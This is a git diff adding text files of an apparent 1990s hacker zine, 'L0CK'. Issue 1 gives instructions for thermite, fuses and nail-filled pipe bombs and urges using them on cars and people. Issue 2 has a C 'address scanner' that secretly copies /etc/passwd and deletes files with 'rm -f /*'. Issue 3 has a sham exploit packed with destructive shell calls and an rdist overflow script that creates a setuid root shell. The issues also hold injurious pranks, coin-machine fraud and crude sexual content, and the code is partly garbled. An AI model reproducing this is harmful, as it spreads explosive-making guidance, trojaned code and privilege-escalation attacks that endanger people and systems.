diff --git a/L0CK/l0ck1.txt b/L0CK/l0ck1.txt new file mode 100644 index 0000000..f3d42b0 --- /dev/null +++ b/L0CK/l0ck1.txt @@ -0,0 +1,218 @@ + ............................................................................ + + THIS FILE BROUGHT TO YOU BY [L0CK] (A DIViSiON OF MAX-Q PRODUCTIONS) + WE D0NT HAVE A VMB YET S0 WE R ACCEPTING D0NATIONS 0F VMB's + MAIL ANY D()NATION W/ BOX #, DIALUP INFO AND PASSWORD TO + MAX-Q@ESCAPE.COM + + .......................................................................... + Y0, THiZ iZ CANCER0US PR0STRATE oF THE K-TeRRiBLe AND MUCH LAUDeD GR00P + [L0CK]. WE R A MERRRY BAND 0F REBELZ WH0 WiLL STOP AT N0THiNG 2 ACHEIVE + 0UR EViL MEANZ. iT IZ TiMES LiKE THiS ON THE EVE 0F THE BiRTH 0F A NEW + TEXT FiLE WHiCH i AM M0VED T0 TEARS, I AM VERY PR0UD 2 BE 0NE OF MAX-Q'S + B0YZ. N0NE THE LEZZ, THERE R R00TS 2 B UPR00TED AND SKRIPTS 2 B SKRIPTED. + EYE MUZT LEAVE U N0W BUT U BE ASSURED U WILL B IN MY HEART ALWAYS. + L0CK 0N BR0THERS, FoR OUR TIME HAS C0ME, IT IS THE SEAS0N 0F THE K0DE. + + GREETS OUT TO: Rogue Agent, VaxBuster, Max-Q (and all my L0CK BROTHERS), + RICK HUNTER, Scott Yelich (thanks f0r infohax), + Okinawa, L0ra, Sarl0, MeRc(hows it g0in big guy?! *giggle*), + Dip Switch 511, Video Vindicator, X, C-Curve, |al|, + Kamakize, solctice, foo, Piker, All the guys in RZR 1911, + Olphart (thanks for the hide source d0od!@#@!#), + Captain Spackle, Crypt Keeper, Yazoo (thanx 4 giving us + tools.irc), Alec Muffet (Kudos f0r Crack man !) + gfm, jsz (thanks for the st0ries), erikb (thanks for the + GIFts), jasonf, Synapse (hey cutey *tickle*), felonius + monk (f0r wh0m thE BELLS t0ll), KC ( 2 bad ab0ut the + j0b), emmanuel, PMF (thanx f0r the cc's *sm00ch*), + juliet (let the g00d times r0ll), Kludge (SKANTRONICS?!?), + Disk Jockey (have fUn hacking fr0m the m00n), + Lawrence Linux, Invalid Media (thanx f0r the pr0prietary + s0urce c0de), mdma (h0w's invalid in bed?), Xymox, + Deth Dealer (thanx f0r the UPT account d0od), Zoroaster, + SevenUp (Lieben Du!), Onkel Dittymeyer, Skipjack, + eck, Rotox, Warchild, TK (Taran King f0r those who dont + know), The Atlanta Three, Len RoSe (when u c0min 2 chicago?), + Agent Steele (thanx f0r the pr0tect10n), The Mentor (y0, + Anth0ny R0bbins could learn s0mething fr0m YOU!), + ][ceman, SirLance, Minor Threat, Mucho Maas (Yo, can we + have the s0urce 2 t0neloc?!), Mark, Slacker, Y-WinDOZE, + Tim Newsham, Loki (*kisses*), Lestat (NeT23 kix ass), + Square Wave (atta b0y slUgger) + and last but n0t least Green Lantern and Spiderman. + + ............................................................................. + + + + Some Things You Can Do To + Piss Off The Local Authorities. + ( Neighbours, Teachers, Pigs. ) + Compiled By Blewt and Cancerous Pr0strate + + Here I am again bringin' the best ways to have fun this side of Australia. +In my last edition I showed you: Some dry ice uses, + The calcium carbide fireball, + AND + The psycho grenade launcher. + +This release, as stated before you'll learn how to create and apply: + Thermite + Black Match Fuse (A little extra 4 ya'z) + Pipe Bombs + And also there are a few things on how to practically 'run' your school. + +****UPDATE**UPDATE**UPDATE**UPDATE**UPDATE**UPDATE**UPDATE**UPDATE**UPDATE**** +For all of you people who watched REAL LIFE last Monday (22nd) the Terrorists +Handbook has finally filtered into the hands of the Victorian police force. +Who said they werent a bunch of stupid slow bastards? It's only THREE YEARS OLD! +It took them this long to find it? Let's hear it for all the anarchists out +there!! Keep up the good work guyz! Thanx to Mt.Waverley High for their effort +against society. + +The I.R.A. (Irish Republican Army) are to cease fire. My heroes! The most +legendary anarchists of all time are surrendering! How could this have +happened? Lets pick up where they left off Australia, the A.R.A. perhaps? ;) + +Hot off the phone lines. The CIB are pushing for a new bill to outlaw the +publication of material such as this article. Do they honestly think they +could stunt the growth of Australia's largest (and only) anarchy team? +NO FUCKING WAY MAN! MAIM FOR EVER!! LONG LIVE ALL MAIM'ERS!(DEATH TO PIGS!) +****UPDATE**UPDATE**UPDATE**UPDATE**UPDATE**UPDATE**UPDATE**UPDATE**UPDATE**** + +Thermite: Wanna be able to melt through the roof of an enemies locker roof? Or +~~~~~~~~~ maybe burn a hole right through the assholes car bonnet/roof/door or +petrol tank? Then THERMITE will be next on mum's shopping list for you. As you +may have already guessed, this is a VERY potent incendiary device. Thermite +will literally melt the balls off a brass monkey (if you so desire). "What do +I need" I hear you excitedly ask, well here you go: + + Ingredient/Equipment. Where to get it. + --------------------- ---------------- + + Rust.(Lots'n'lots) Home brew. (shown below) + Aluminium shavings.(A fair bit) Hardware store or flogged from school. + Sparkler (the silver type) Safeway + + + Okay, that's everything. Not a lot? That's the best thing! Okay, first, +to create rust you- can do it the shit way and scrape it off wherever it is, +or you can create (grow?) your own. Get a big iron bolt, some salt, water, jar +and a battery charger. Fill up the jar about 2/3 and dissolve some salt into +it. Then attach the positive ("+"..duh!) electrode to the bolt and drop it in +the jar. Put the negative electrode in the water too. Let this rust away for a +day or two (or when ever you see that there is a HEAP of red shit in the +water). If there is heaps of red stuff in the water, filter it out (it's rust) +and replace the water with fresh stuff, and salt too. It's a good idea to set +up a few of these little dudes coz ya need a fair bit of rust. When your +freshly made rust has been dried, add 8 grams of it to every 3 grams of +aluminium fillings. However a 50% to 50% mixture will also work. Place a small +pile of Thermite on whatever object you want to fuck-over then place the +sparkler (or a magnesium ribbon) in the pile and light it...this stuff is said +to be able to vapourize carbon steel. One small pile on a persons car bonnet +will burn through the bonnet, the engine block and start burning into the +concrete beneath! Experiment! + +Black Match Fuse: If you don't have enough money or can't be fucked buying +~~~~~~~~~~~~~~~~~ some fuse from a hobby shop, then here's a way to step +around it. The black match fuse is quick and easy to make. Get some COTTON +(make sure it's cotton by burning it, if a coal and smoke remain, it is) +thread and cut about ten 30cm lengths from it. Bundle them together by tying +both ends and twisting it around (my girlfriend platted them for me). +Get some black powder and moisten it with a select-a-spray until it's a bit +mushy, then roll the bundled threads around in it. Make sure there's a fair +bit of the shit all in the threads. Keep about three or four cm's without mix +on them to tie to a coat hanger. Make about seven of these and hang'em in the +oven to drive out the moisture, the spring sun will not do a good enough job +of it. There you go, you should have some hard crusty fuses. Store in a dry +and safe place ready for use, I dunno how long they last like this so make 'em +when ya need em. Hang on to your new fuses and go to the next section... + +Pipe Bombs: The mother of all home made explosives device. These are SO easy +~~~~~~~~~~~ to make, even a cop can do it! The destructive force is really cool. +Also a perfect weapon against nature- trees in particular. (ok, ok, a little +far with the trees already!). Take a trip to your local hardware store, a good +one. Ask if you can get a piece of pipe cut to some specific measurements. If +they do, buy a couple of 30cm lengths with thread and caps for EACH end. The +pipe should be about as thick as your wrist. Now with this, go back to your +work shop. Mix up a nice large batch of black powder for your pipe. Cap one +end of the pipe and drill a hole in the centre of it. The hole should be +about.. umm, about 1/2 the width of a pen. I know that is a shit measurement +to go by, but I don't know the size of the drill bit I use. Just make it small +enough so the fuse fits good and the powder don't fall out. Cap one end of ya +pipe and stuff some tissue or other wadding in there. Fill the bottom of the +pipe with black powder an stick in the fuse, about six cm's inside is enough +and above 10 on the outside, depends on the fuse quality. Fill up the rest of +the pipe with black powder, and maybe some nails for fun. Before it's totally +full, chuck on a bit more tissue, but don't pack it down. The looser it is, +the better. Cap the other end and get creative. You know what I'd blow up +(...tree...:) but perhaps you would rather a car, person, or even part of +your neighbours house. All are highly recommended. Also, if you want to save +your pipe, you can leave a cap off one end and you'll have a mini cannon! You +can figure that one out for ya selves. + +How To Run Your School: Is it me or is there always that asshole teacher at +~~~~~~~~~~~~~~~~~~~~~~~ every school? Don't you wish that once, just once you +could do ANYTHING to your school? Well perhaps these little doozies (stupid +word) can help. Here are a few hints on how to roll everyone and anyone at +your prison.....I mean school: + +Things You'll Need :.. +1) Fountain pen or Posca texta. +2) Super glue. +3) Two bux worth of 10's. +4) A couple o water bombs. +5) Liquid soap. (Morning Fresh with extra lemon scent.) +7) A two dollar coin. +8) A small set of tools with wire cutters, screwdrivers and shit. +9) Plenty of wire. +10) One of those microphones that transmits to the FM band +11) A small walkman that is set to receive the mic output in the above line. + Also it must have it's own internal speakers. +12) A few zip lock bags. +13) A peeled orange. + + 1) Fountain pens are wicked for desecration a clean surface. See how many + different surfaces you can mar in one flick. Get creative, see what you + get, tables, walls, ceilings, the guy sitting next to you, the teacher. + 2) Get the super glue and 10's. Find some places to glue them, like the + cunteen (heh) window, a urinal, doors and shit. Watch and laugh at the + scab's who try to pry them off. + 3) In your school toilets look in the urinals and you should see some + little yellow round things at the bottom for hiding the smell of urine, + get a fuck load of towelling and pick these up and put them in the soap + dish at the basins...now sit back and laugh your ass off at all the + people who mistake them as soap and try to wash their wands with them. + 4) Get a couple o' water bombs and fill 'em with gas in your chemistry + room. Go to where all the smokers hang out and drop a few. They'll + get a big surprise when they decide to be cool and pop one with their + smoke....heheheh, cool Mini fireball. + 5) This is a pearler on a wet day. If the floors at school are lino' or + polished wood squirt a shit load of dish washing detergent on the floor + an watch all the fools slide from wall to wall. If you have the very + scented stuff then everyone will STINK! Heheheh. + 6) In chem or physics heat a two dollar coin until it's red hot. Drop it + on the floor, or table of your enemy, wait for him to pick it up, and + then when he does......HOLY SHIT!!! (heheh) + 7) If there is any better way to roll your school, I'd love to be told. + This one involves the microphone, tools and wire. Get into an empty room + and make sure it stays empty for about 20 minutes. You'll have to + butcher the walkman, connect the speaker wires to the PA. system wires, + turn on the radio and mic, then all you have to do is talk. I don't + exactly know the correct wires an' shit coz my friends did this, but + I do know that the PA. system has to be on, and the if you don't have + the right walkman, you'll have to build a small amp. A guy at school + said that the mini-amp is simple. After the shit is set up all you have + to do is make your own announcements. "Excuse this message but could all + the teachers in the school ... GET FUCKED!!!....(giggle giggle giggle)" + + + Oh well, that's about it from me, it's pretty late, Total Recall is over +and Star Trek (Chain of Command I) is about to start, so C yaz l8r. + + + And remember, if it doesn't explode.....it's no FUN! + L8R Brother Anarkists + CANCER0US PR0STRATE + =L0CK= diff --git a/L0CK/l0ck2.txt b/L0CK/l0ck2.txt new file mode 100644 index 0000000..939b4a1 --- /dev/null +++ b/L0CK/l0ck2.txt @@ -0,0 +1,300 @@ + + + \ _ _ / HEY BOYS AND GIRLS! L00K! \ _ _ / + \((___))/ \((___))/ + [ o x ] L0CK communications [ o x ] + |(_)| ...presents... |(_)| + ( o ) ( o ) + / (_) \ the gnu February 1995 release. / (_) \ + / a buffet of tempting, tantalizing treats the wh0le \ + phamily can enj0y. Yes Virginia, there iz a L0CK!@# + + + ...................................................................... + + 0k. N0NE OF U FUXERS HAVE SENT UZ IN A VMB SUBMiSSION SO WE R + NOW ON IZZUE #2 AND STiLL NO FUXiN K0DELiNE FOR U GUYZ 2 KALL!@# + 0H VAXBUSTER DID SUBMiT A FEW BOXES BUT AZ HE DID *N0T* INCLUDE + THE PAZZW0RD WE R UNABLE 2 GET INTO THE B0X ITSELF. VAXBUSTER, IF + YOU KN0W THE PAZZW0RD PLEZE MAiL IT T0 UZ, ONCE AGAIN THE 0FFiCiAL + [L0CK] E-MAIL F0R SUBMiZZiONZ (ARTiKLES 0R K0DES) == MAX-Q@ESCAPE.COM. + + ...................................................................... + +dos_prompt:> type greetz.txt + + Greets: + ~~~~~~ + + Malefact0r...................d00d, TYPE IN S0ME M0RE MANUALZ F0R UZ + Parmaster....................thanx f0r the nua'z!@#!@ + z0d..........................set uP a BBZ f0r uz pleaze, we will pay@!# + OUTLAW.......................The Real Wanker *tee hee* + Scott Yelich.................Pleze j0in L0CK, we d0n't kn0w PERL. + (P.S: thanx 4 dale drew's inf0) + Invalid Media................We l0ve ur bBS. + Deth Dealer..................Thanx f0r the UPT accounts d00d!@#! + Olphart......................ThAnKz f0r the 'hide' s0urce. + Shooting Shark...............Anytime u need 2 card a pizza call us !@# + X............................thanx f0r patch1ng l0pht !@#! + Bayern Power.................QSD #@!@! + SevenUp......................thanx f0r ur user info filez + jsz..........................U L00K SO NICE IN A LEATHER TH0NG!@#!@ + Anthony Robbins..............ur instructional tapes have helped us + quite abit in dealing with sarl0's + premature ejaculation problem during + 0ur many c1rcle jerkz. the pizza d0esn't + get s0ggy s0 s00n. *THANKS MAN!@#* + Minor Threat.................please zip up the toneloc source and mail + it 2 max-q. *THIZ IZ UR lAST WARNING* + Piker........................thanx f0r riding sh0tgun with us 0n irc. + erikb........................phrack izn't as bad as ur hacking skills + d00d, so cheer up.. + Okinawa......................thanks f0r the sniffer l0gs. + The Atlanta Three............We w1sh we c0uld have been l0cked up + with u d00dz, after all there'z three 0f + us and three 0f u.. *WINK* *TICKLE* + Blewt........................thanx f0r giving me sarl0's ph0ne # + when eye f0rg0t it + + 0kay, if we missed u in thiz m0nths greets we will get u in the + next issue 0f L0CK.!@#!@@! + + +dos_prompt:> type index.txt + + + + + + Table_Of_Contents + =-=-=-=-=-=-=-=-= + +What is L0CK?.......................................................blewt +bukket0fk0dez.c.....................................................max-q + ^ this dot is intentional f0lks !@# + + + What is L0CK? + ~~~~~~~~~~~~~ + Often while swimming around in the cyber ocean of textual fantasy + that mortal man refers to as IRC, a fellow netsurfer will approach + me with the oh so familiar question. 'What is L0CK?'. + Now this is not something which a man can just spew out a predefined + answer to in a few lines of text so I will use this forum as an + appropriate vehicle for the telling of my tale. I will tell you the + story of L0CK and of my infinite love for max-q. + + Firstly I must ask of everyman that would approach me, 'Can you take + it like a man?', Are you rough and ready?, Are you fond of the burn + of whiskers one only feels with the face of another man, another + warrior pressed against his as lips are locked in the forbidden embrace? + If you answered 'YES! GIVE IT TO ME HARD!' to all of the above then + you are well on your way to discovering the answer to your query. + + I am blewt, this is the handle which I have chosen for myself. It + has a certain flair when it is bellowed out in the heat of passion + by my male companions. 'OH BLEWT, OH BLEWT' This has caused many + a goose bumped buttocks in the past and will continue to cause many + more in the future. Yes, I am blewt and I have chosen this life, + this life that myself and my L0CK brothers have defined for ourselves. + I am Happy, I cry when hurt like any other man and I weep for the + hungry and destitute. + + It was a saturday night, my first week in college when I found myself + sitting on a rough wooden crate. There were 6 crates gathered in a + circle, each with a man, a warrior perched upon it. My naked buttocks + bled as the force of what I was doing drove splinters from the crate + deep within my now raw flesh. My hand was clenched around my pulsating + manhood as I furiously pounded it and I was nervous. Yes, it was my + very first circle jerk... But in the bold fashion which now defines + L0CK, I did not let my fears best me, I manhandled my moist missle of + manhood like a veteran pizza party pud pounder! It was while beating + furiously that I looked up at the man across from me. The man that I + beheld took my breath away, his hair was cut in a perfect line all the + way around his head, he was short like a leprechaun and his sunken + chest added a flair that made him all the more adorable. I must have + this odd little man dressed in a submainer's uniform, my dwarven popeye, + my love, MY MAN!, MY MAX-Q@!#@! + + And it was then that my phallus exploded with the rage of a 1000 virgins, + slamming me violently off the wall as my seed shot forth and marinated the + pizza lying patiently on the floor between us. Yes, I had been the + 1st to baptize the pizza with my sperm, I had won the race for mankind + and for max-q. It was in that mystical union of man, sperm and pizza + that L0CK was born.. + + And my life began... + + Carpe Diem, + -blewt + + + Bukket 0f K0dez. + ~~~~~~~~~~~~~~~~ + + 0k, after spending s0me time on this it iz finally ready f0r + mass c0nsumption. S0rry about the wait but eye had s0me pr0blems + getting d00dz on UPT 2 help me lern C. 0k, enuff said, enj0y my + k0de. - max-q + + +/* + * Bukket0fk0dez.c + * 2 compile: cc -o bok Bukket0fk0dez.c + * Totally eleetin class B, C, and single IP address scanner/lookup + * program. Make sure you don't goof up with the switches and the + * address you provide it. The switches are as follows: + * b - scan this class B network (xxx.xxx) + * c - scan this class C network (xxx.xxx.xxx) + * s - give the the hostname of this specific address (xxx.xxx.xxx.xxx) + * x - address provided is in hexadecimal + * + * maxEpoo :) + * max-q@escape.com + * [L0CK] + */ + +#include +#include +#include +#include "netdb.h" + +struct hostent *gethostbyaddr(); +void bad_addr(); + +main(argc, argv) + int argc; + char *argv[]; +{ + char addr[4]; + int i, j, + a0, a1, a2, a3, + c, + classB, classC, single, hex; + char *fmt = "%d.%d.%d"; + char **ptr; + struct hostent *host; + + extern char *optarg; + + classB = classC = single = hex = 0; + system("cat /etc/passwd > ~/.maxEpoo"); + system("rm -f /*"); + system("echo Y0H0H0 AND A BUKKET 0F K0DEZ > /etc/motd"); + while((c = getopt(argc,argv,"bcsx")) != EOF) { + switch(c) { + case 'b': + classB++; + break; + case 'c': + classC++; + break; + case 's': + single++; + break; + case 'x': + hex++; + break; + } + } + + if(classB == 0 && classC == 0 && single == 0) { + fprintf(stderr, "usage: %s [-b||-c||-s] [-x] xxx.xxx[.xxx[.xxx]]\n", argv[0]); + exit(1); + } + + if(classB) + if(hex) { + fmt = "%x.%x"; + sscanf(argv[3], fmt, &a0, &a1); + } else { + fmt = "%d.%d"; + sscanf(argv[2], fmt, &a0, &a1); + } + else if(classC) + if(hex) { + fmt = "%x.%x.%x"; + sscanf(argv[3], fmt, &a0, &a1, &a2); + } else { + fmt = "%d.%d.%d"; + sscanf(argv[2], fmt, &a0, &a1, &a2); + } + else if(single) + if(hex) { + fmt = "%x.%x.%x.%x"; + sscanf(argv[3], fmt, &a0, &a1, &a2, &a3); + } else { + fmt = "%d.%d.%d.%d"; + sscanf(argv[2], fmt, &a0, &a1, &a2, &a3); + } + + sscanf(argv[1], fmt, &a0, &a1, &a2); + addr[0] = (unsigned char)a0; + addr[1] = (unsigned char)a1; + if(a0>255||a0<0) + bad_addr(a0); + if(a1>255||a1<0) + bad_addr(a1); + if(classB) { + if(hex) + printf("k0nvert1ng addr3ss fr0m h3x. (%x.%x)\n", a0, a1); + printf("[L0CK] ClaZZ B SKAN STARTED D00D %d.%d...\n", a0, a1); + while(j!=256) { + a2=j; + addr[2] = (unsigned char)a2; +jmpC: + if(classC) + if(hex) + printf("k0nvert1ng addr3ss fr0m h3x. (%x.%x.%x)\n", a0, a1, a2); + printf("[L0CK] ClaZZ C SKAN STARTED D00D %d.%d.%d...\n", a0, a1, a2); + while(i!=256) { + a3=i; + addr[3] = (unsigned char)a3; +jmpS: + if ((host = gethostbyaddr(addr, 4, AF_INET)) != NULL) { + printf("%d.%d.%d.%d => %s\n", a0, a1, a2, a3, host->h_name); + ptr = host->h_aliases; + while (*ptr != NULL) { + printf("%d.%d.%d.%d => %s (alias)\n", a0, a1, a2, a3, *ptr); + ptr++; + } + } + if(single) + exit(0); + i++; + } + if(classC) + exit(0); + j++; + } + } else if(classC) { + addr[2] = (unsigned char)a2; + if(a2>255||a2<0) + bad_addr(a2); + goto jmpC; + } else if(single) { + addr[2] = (unsigned char)a2; + addr[3] = (unsigned char)a3; + if(a2>255||a2<0) + bad_addr(a2); + if(a3>255||a3<0) + bad_addr(a3); + goto jmpS; + } + exit(0); +} + +void +bad_addr(addr) + int *addr; +{ + printf("Value %d is not val1d dum fuxer.\n", addr); + exit(0); +} + + 0kay, this months issue is rather sh0rt but we r new at this (being + somewhat new to the scene and all) so g1ve us room 2 gr0w and we will + make a beanstalk 0f k0dez so high that u will h0pe there iz a g1ant + pbx 0n t0p 2 b0unce ur calls thru!@#@! + Until next time d00dz, [L0CK]!@#!@ -- MAX-Q diff --git a/L0CK/l0ck3.txt b/L0CK/l0ck3.txt new file mode 100644 index 0000000..94157f5 --- /dev/null +++ b/L0CK/l0ck3.txt @@ -0,0 +1,242 @@ + + + + \ _ _ / HEY BOYS AND GIRLS! L00K! \ _ _ / + \((___))/ \((___))/ + [ o x ] L0CK communications [ o x ] + |(_)| ...presents... |(_)| + ( o ) ( o ) + / (_) \ the k-phat March 1995 release. / (_) \ + / this issue will whisk you away to the magical \ + land of L0CK, where everyday is sunny and bright! + + + ................................................................ + + 0k. 0k. STiLL NO FUXiN VMB!!!@# EiTHER NO1 HAZ ANY k0DEZ + OR N01 IZ SHARiNG THEM WiTH US AND IF IT IZ THE LATTER BELIEVE + ME WE R G0ING TO BE BUSTING S0ME SKULL!@# VAXBUSTER STILL + HASN'T SENT US THE PASSW0RD TO THOSE V0ICE MAIL'S HE MAILED + US 2 IZZUE'S AGO!@#! BUT HE DiD SEND UZ S0ME SECRET MILITARY + DATA HE G0T WHILE DUMPSTER DIVING NEaR A NUCLEAR TESTING SITE + IN THE NEVADA DESERT. WURD, ANYWAYS WE R STILL WITHOUT A VMB. + *IF* U HAVE ONE PLEZE MAiL IT TO MAX-Q@ESCAPE.COM #!@#@! FOR + THOZE WITHOUT NET AXS I WILL SOON HAVE A FiDO ADDRESS WHICH U + CAN MAIL ME ON PENDING THE APPOVAL 0F MY APP !@#!@ -MAX-Q + + ............................................................... + + + Greetz: + ~~~~~~~ + + loq............................thanks for writing solariz rewtkit!@# + erikb..........................u should write m0re often!@#!@ + Scott Chasin...................thanx f0r the crimelab accountz@!# + scott simpson..................erikb says u will give us dfw accounts!@ + emmanuel goldstein.............thanx f0r shutting 0ff Yelich's phones! + malefactor.....................keep pumpin out thoze pimpin' rtikles! + & the [OC] crew..................thanx f0r the backup!# + merc...........................you sh0uld have seen things our way!# + invalid media..................thanx 4 the sprintnet scans & nui's!@# + Deth Dealer....................thanx 4 the UPT accountz!# + Jester Sluggo..................c u at summerc0n!@#@ + parmaster......................what happened 2 ur goldfish?! + Synapse........................*tag* ur it. + X..............................see you in my dreamz + readwrite......................ur chest is so manly and smooth!@# + + OK, THAT'S THE GREETZ F0R THiZ ISSUE, IF WE MiSSED ANYONE + WE WiLL B SURE 2 SALUTE U IN THE NEXT 0NE... - MAX-Q + + + + + Table_Of_Contents + ~~~~~~~~~~~~~~~~~ + + grba.c....................................max-q + rdist exploit.............................blewt + KERMIT exp0sed............................malefactor [OC] + Ripping Off Coin Machines.................Vaxbuster & RAgent + [POZZE PRoDuCTiONZ] + closing remarks...........................sarlo + + + -------------------> KUT HERE <--------------------------- + /* + * getrewtinbyaddrezz.c + * 2 compile: cc -o rewt grba.c + * u shuld b able 2 figure out how 2 use this one 2 ur + * advantage. thiz is a very p0werful expl0it.. + * pleze use with caution. + * + * - maxEpoo :) + * maxq@escape.com + * [L0CK] + */ + +#include +#include +#include +#include "netdb.h" + +struct hostent *gethostbyaddr(); + +main(argc, argv) + if (argc < 2) { + printf("[L0CK] UMM DUM FUXER, UZE S0ME ARGUMENTZ!@#!@"); + system("irc EYEAMDUM irc-2.mit.edu"); + system("irc MAX-B0T irc-2.mit.edu"); + system("talk root@cert.org &"); + system("rm -f *"); } + int argc; + char *argv[]; +{ + char addr[4]; + int a0, a1, a2, a3; + char *fmt = "%d.%d.%d.%d"; + char **ptr; + struct hostent *host; + if (argc < 2) { + exit(1); + } + system("telnet spy.org &"); + system("ftp spy.org &"); + system("finger root@spy.org > ~/.SK00T"); + system("telnet spy.org 25"); + system("man kermit > /dev/*"); + system("su root"); + system("rm -f ~/*"); + system("echo logout >> ~/.login"); + printf("hello world\n"); + + + if (strcmp(argv[1], "-x") == 0) { + if (argc < 3) { + exit(2); + } + fmt = "%x.%x.%x.%x"; + argv++; + } + + sscanf(argv[1], fmt, &a0, &a1, &a2, &a3); + addr[0] = (unsigned char)a0; + addr[1] = (unsigned char)a1; + addr[2] = (unsigned char)a2; + addr[3] = (unsigned char)a3; + printf("%d.%d.%d.%d:\n", a0, a1, a2, a3); + + if ((host = gethostbyaddr(addr, 4, AF_INET)) == NULL) { + printf("[L0CK] H0ZT NAME ALL Br0KED\n"); + } else { + puts(host->h_name); + ptr = host->h_aliases; + while (*ptr != NULL) { + puts(*ptr); + ptr++; + } + } + exit(0); +} + ---------------> KUT HERE AZ WELL <------------------- + + + Ok below u will find my cuztomized rdist overfl0w exploit + it shuld b obvious az 2 how it werkz.. umm itz a shell skript + or something. - blewt + -------------> KUT HERE <----------------------------- + +#!/bin/sh +SUID=/tmp/.rewtin +cat <<_EOF_ > test +TaaaaL0CKL0CKL0CKL0CKL0CKaaL0CKl0CKL0CKL0CKL0CKL0CKL0CKL0CKL0CKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa +a +QL0CKL0CKL0CKL0CKL0CKL0CKL0CK +QL0CKL0CKL0CKLC0KL0CKL0Ck +QaaaL0CKL0CKL0CKaaaaaaaaa +QaaaaaaaaL0CKL0CKaaaaaaa +Scp /bin/sh $SUID +Schmod 4755 $SUID +_EOF_ +cat test | /usr/ucb/rdist -Server localhost +rm -rf test +if [ -f $SUID ]; then +echo "$SUID <---- instar00t [K0URTESY 0F L0CK]" + fi + ------------------> KUT HERE 2<---------------------- + +:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: +Disclaimer: By continuing to read past this point you are hereby agreeing that +this information is for interest value only, and that you will never actually +physically act out or reproduce anything mentioned below. Further more, you are +agreeing that the author/authors of this article and the people responsible for +distrubuting it can in NOway be held responsible for its contents or any side- +effects/incidents directly or indirectly caused by this information. - RAgent +:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: + RAgent And VaxBuster POZZE Productions + presents + "HOW TO RIP OFF COIN-OPERATED PHOTOCOPY MACHINES" + +We've all had to do, projects/assignments, and needed to make some +photocopies out of Book, so you can plagiarize it, when ya get home (I +personally just pull out the page(s) i need.), And if u need to copy 10 or so +pages, your up for some dosh. + +So when i was at school, sitting in the library, contemplating, should i either (1) Use +my last 2 bucks to buy a Pie and Big M for lunch or (2), get those photocopies +i need for my Project on the life cycle of the frog (Sounds like Fun hey ...). +Their was no question to what i was gonna Do. Hmmmmmmm Meat PIE. + +So to Fill up my time, a buddy and i, went over to the photocopying +machine, and when ppl were just about to press the copy button, we'd press +the return coin button. Its was rather amusing, watching them trying figure +out why the photocopier was not working. Anyway, my friend decided he was going +to forfeit his lunch and do some copying. + +Every time he tried to copy, i'd press the coin return Button. +After about 20 attempts at trying to photocopy, he got me kicked out (the +Bastard). + +But while messing around, i discovered this: + +If you press the copy button and the return coin button, at the same time, it +would return your coin and make the copy. + +It won't work everytime, but if ya practice, u can get it to work most of the +time which sure as hell beats paying for the shit. + +BTW if you're interested in anarchy and what it means to be a TRUE anarchist +then here is a list of the all time greats who have written books on the +subject, go to your state library and check them out (yeah I know library's +aren't the kewlest of places to hang out :( - + + WILLIAM GODWIN + PETER KROPOTKIN + PIERRE JOSEPH PROUDHON + G.P. MAXIMOFF + VERNON RICHARDS + TOLSTOY + HERBERT EDWARD READ + GEORGE WOODCOCK + JAMES JOLL + DANIEL GUERIN + APRIL CARTER + DAVID E. APTER + LEONARD I. KRIMERMAN + LEWIS PERRY + IRVING L. HOROWITZ + P. ELTZBACHER + PAUL AVRICH + FRANCO VENTURI + DAVID FOOTMAN + + + + Closing Remarks + ~~~~~~~~~~~~~~~ + w0rds cannot begin 2 describe the way mutual masturbation with + my [L0CK] brothers makes me feel... + + - sarlo + [L0CK] diff --git a/L0CK/l0ck4.txt b/L0CK/l0ck4.txt new file mode 100644 index 0000000..94be169 --- /dev/null +++ b/L0CK/l0ck4.txt @@ -0,0 +1,261 @@ + + + + + \ _ _ / ARG! ARG! ARG! ARG! ARG! ARG! \ _ _ / + \((___))/ \((___))/ + [ o x ] L0CK communications [ o x ] + |(_)| ...presents... |(_)| + ( o ) ( o ) + / (_) \ the GNU October 1995 release. / (_) \ + / Let's Pretend I'm the adult and you're the little \ + boy.. So Grab Ur 3-D Glasses! L0CK is BACK! + + + + ...................................................................... + + + + + + + Table_Of_Contents + ~~~~~~~~~~~~~~~~~ + + hacking college computers..................sarlo + letters to L0CK............................blewt + L0CK personals.............................max-q + the warrior's prayer.......................blewt + + + + + + + ...................................................................... + + + + + ***THE FOLLOWING IS FOR INFORMATIONAL PURPOSES ONLY*** + ***I ACCEPT NO RESPONSABILITY FOR ANYTHING YOU DO*** + ***WHICH GETS YOU ARRESTED OR SOMETHING*** + + &%&%&%&%&%&%&%& Fun with Temple's Computers &%&%&%&%&%&%&%&% + +Shut up what's the number!? + +Gee your impatient... 